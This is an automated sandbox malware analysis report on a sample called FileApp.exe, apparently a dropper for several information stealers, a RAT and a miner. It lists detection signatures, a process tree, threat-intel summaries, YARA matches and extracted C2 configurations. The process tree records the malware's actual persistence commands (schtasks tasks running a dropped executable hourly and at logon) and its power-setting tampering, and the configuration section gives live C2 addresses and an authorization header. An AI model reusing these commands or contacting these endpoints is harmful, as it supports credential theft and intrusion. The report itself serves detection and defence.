Edit tour

Windows Analysis Report
FileApp.exe

Overview

General Information

Sample name:	FileApp.exe
Analysis ID:	1504272
MD5:	84fb9da5b4879a284fe19a1635d9ee39
SHA1:	6e7156eb87e3e376ae128eb40e1cc365ad80467e
SHA256:	45bd836cdf29ad666cc785f6df5e9ff0e43e9cb63ff06aca339fdb1f3ddbfa34
Tags:	exeTofsee
Infos:

Detection

LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops PE files to the document folder of the user

Drops PE files with a suspicious file extension

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Modifies power options to not sleep / hibernate

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FileApp.exe (PID: 1340 cmdline: "C:\Users\user\Desktop\FileApp.exe" MD5: 84FB9DA5B4879A284FE19A1635D9EE39)

RegAsm.exe (PID: 420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

ZYgCMtJP3wxddinn5Sa3IKJH.exe (PID: 2096 cmdline: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe MD5: D8ECB462D3046A0EE172551C5D505C8E)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4888 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

l6BAwR4854FJ5LVXvo8GWfAt.exe (PID: 5644 cmdline: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe MD5: 68EBCC4AD727C077AEB5CC60B868E304)

WerFault.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824 MD5: C31336C1EFC2CCB44B4326EA793040F2)

kPy9KuGWnhtidoY4IdmVbiaT.exe (PID: 3048 cmdline: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe MD5: 8C673503632E93C08931CD68E7476E9C)

xNc0eiwaHinah8TaPUA3TuXZ.exe (PID: 4072 cmdline: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe MD5: 6B19E5C100DB0812FFB7813A1503C05D)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

B4LiZFzJ_IAKzmYhwI_ve0Iy.exe (PID: 5512 cmdline: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe MD5: B5887A19FE50BFA32B524AAAD0A453BC)

B4LiZFzJ_IAKzmYhwI_ve0Iy.exe (PID: 1268 cmdline: "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe" MD5: B5887A19FE50BFA32B524AAAD0A453BC)

schtasks.exe (PID: 4512 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6784 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DSN_5xuwaC5nkP_MHzd7lLTl.exe (PID: 7060 cmdline: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe MD5: 6F99968CC27D2D6A07A921AB703A5D5D)

conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

uht_7KlzJBHoKg010MzYxndX.exe (PID: 7012 cmdline: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe MD5: 0DE88C2F978A57026E58E6CA90AE5D69)

BitLockerToGo.exe (PID: 5352 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

m9GWTeQylsPUCcnTEkTCS8lf.exe (PID: 6816 cmdline: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe MD5: EF210F3D8E05ECAFD8D41A98B5806218)

BitLockerToGo.exe (PID: 6828 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

5Qs0KV98dc5QrQIgi5l7CPu5.exe (PID: 5776 cmdline: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe MD5: 025EBE0A476FE1A27749E6DA0EEA724F)

powercfg.exe (PID: 5612 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2784 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 1428 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3960 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

g5YPTfbb3UXQYqfB9k0rJePl.exe (PID: 4024 cmdline: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe MD5: 1959CE1E98B798963F8B7D04BFB71E69)

cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pO77aCusXJv6mYqR0srms9ou.exe (PID: 5960 cmdline: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe MD5: 998F7FB6068E4377618BCDB2138BC6F0)

conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 4600 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4324 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 2192 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 592 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

jewkkwnf.exe (PID: 4032 cmdline: C:\ProgramData\jewkkwnf\jewkkwnf.exe MD5: B5887A19FE50BFA32B524AAAD0A453BC)

jewkkwnf.exe (PID: 1492 cmdline: C:\ProgramData\jewkkwnf\jewkkwnf.exe MD5: B5887A19FE50BFA32B524AAAD0A453BC)

ExtreamFanV6.exe (PID: 5112 cmdline: "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe" MD5: B5887A19FE50BFA32B524AAAD0A453BC)

ExtreamFanV6.exe (PID: 3656 cmdline: "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe" MD5: B5887A19FE50BFA32B524AAAD0A453BC)

ExtreamFanV6.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe" MD5: B5887A19FE50BFA32B524AAAD0A453BC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Threatname: LummaC

{"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "stamppreewntnq.shop", "locatedblsoqp.shop", "millyscroqwp.shop"], "Build id": "E6UHNR--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d"], "Botnet": "6eeb5dff1d479d082f77f2c9017c3bf5"}

Threatname: RedLine

{"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000015.00000002.2991424929.0000000002818000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: FileApp.exe PID: 1340	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
37.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
25.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
25.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45249:$s1: file:/// 0x451a5:$s2: {11111-22222-10009-11112} 0x451d9:$s3: {11111-22222-50001-00000} 0x42409:$s4: get_Module 0x3cb9b:$s5: Reverse 0x3d85f:$s6: BlockCopy 0x3cb64:$s7: ReadByte 0x4525b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
36.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43449:$s1: file:/// 0x433a5:$s2: {11111-22222-10009-11112} 0x433d9:$s3: {11111-22222-50001-00000} 0x40609:$s4: get_Module 0x3ad9b:$s5: Reverse 0x3ba5f:$s6: BlockCopy 0x3ad64:$s7: ReadByte 0x4345b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
25.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
25.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
